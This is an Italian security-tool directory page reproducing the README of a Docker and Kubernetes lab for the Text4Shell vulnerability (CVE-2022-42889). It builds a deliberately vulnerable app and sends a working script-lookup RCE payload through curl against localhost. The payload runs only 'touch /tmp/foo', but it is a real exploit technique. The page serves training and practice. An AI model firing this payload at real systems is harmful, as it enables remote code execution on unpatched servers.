Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
text4shell-cve-2022-42889 — Laboratorio Kubernetes per CVE-2022-42889 | Kitploit
Strumenti/GitHubGitHub/devenes/text4shell-cve-2022-42889
Sicurezza dei ContenitoriAnalisi delle VulnerabilitàSfruttamento di Applicazioni WebSicurezza CloudApprendimento e FormazioneLab e Pratica
GitHubdevenes/text4shell-cve-2022-42889

text4shell-cve-2022-42889

Laboratorio Kubernetes per CVE-2022-42889

Vedi Repository
213 anni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

Text4Shell CVE-2022-42889

Laboratorio Docker per CVE-2022-42889

Puoi costruire l'immagine Docker localmente oppure scaricare l'immagine da Docker Hub ed eseguire il contenitore.

Clona il repository

root@kitploit:~
git clone https://github.com/devenes/text4shell-cve-2022-42889.git

Costruisci l'immagine Docker localmente

root@kitploit:~
docker build --tag=text4shell .

Esegui il contenitore Docker

root@kitploit:~
docker run -d --rm -p 8080:8080 text4shell

Oppure scarica l'immagine da Docker Hub ed esegui il contenitore

root@kitploit:~
docker pull devenes/text4shell:v1.0
docker run -d --rm -p 8080:8080 devenes/text4shell:v1.0

Testa l'applicazione passando una stringa al parametro search:

root@kitploit:~
curl http://localhost/text4shell/attack?search=<anything>
  • L'attacco può essere eseguito passando una stringa ${prefix:name} dove il prefisso è il lookup sopra menzionato:
root@kitploit:~
${script:javascript:java.lang.Runtime.getRuntime().exec('touch /tmp/foo')}

Attacco usando curl:

root@kitploit:~
curl -X GET "http://localhost:8080/text4shell/attack?search=%24%7Bscript%3Ajavascript%3Ajava.lang.Runtime.getRuntime%28%29.exec%28%27touch%20%2Ftmp%2Ffoo%27%29%7D"
  • Puoi anche provare a usare i prefissi dns o url

Ottieni l'ID del contenitore

root@kitploit:~
docker container ls

Entra nel contenitore

root@kitploit:~
docker exec -it <container_id> bash

Verifica se l'attacco RCE ha avuto successo

  • Dovresti vedere un file chiamato foo creato nella directory /tmp:
root@kitploit:~
ls /tmp/

Puoi fermare il contenitore eseguendo il seguente comando

root@kitploit:~
docker container stop <container_id>

Laboratorio Kubernetes per CVE-2022-42889

Spostati nella directory kubernetes e segui le istruzioni nel file README.md.

root@kitploit:~
cd kubernetes

Crea un cluster kind

root@kitploit:~
kind create cluster --config kind-config.yaml

Distribuisci l'applicazione vulnerabile nel cluster

root@kitploit:~
kubectl apply -f deployment.yaml

Crea un servizio per esporre l'applicazione

root@kitploit:~
kubectl apply -f service.yaml

Attacca l'applicazione vulnerabile usando curl

root@kitploit:~
curl -X GET "http://localhost:8080/text4shell/attack?search=%24%7Bscript%3Ajavascript%3Ajava.lang.Runtime.getRuntime%28%29.exec%28%27touch%20%2Ftmp%2Ffoo%27%29%7D"

Ottieni il nome del pod usando kubectl get pods

root@kitploit:~
kubectl get pods

Entra nel pod usando kubectl exec

root@kitploit:~
kubectl exec -it $(kubectl get pods | grep text4shell |awk '{print $1}') -- bash

Verifica se l'attacco ha avuto successo

root@kitploit:~
ls /tmp/ | grep foo

Puoi trovare il tutorial dettagliato sul mio corso Udemy qui


Riferimenti:

  • https://github.com/karthikuj/cve-2022-42889-text4shell-docker
  • https://www.docker.com/blog/security-advisory-cve-2022-42889-text4shell/
  • https://unifiedguru.com/security-advisory-cve-2022-42889-text4shell-docker/
  • https://medium.com/mii-cybersec/cve-2022-42889-text4shell-vulnerability-17b703a48dcd
Scarica lo strumento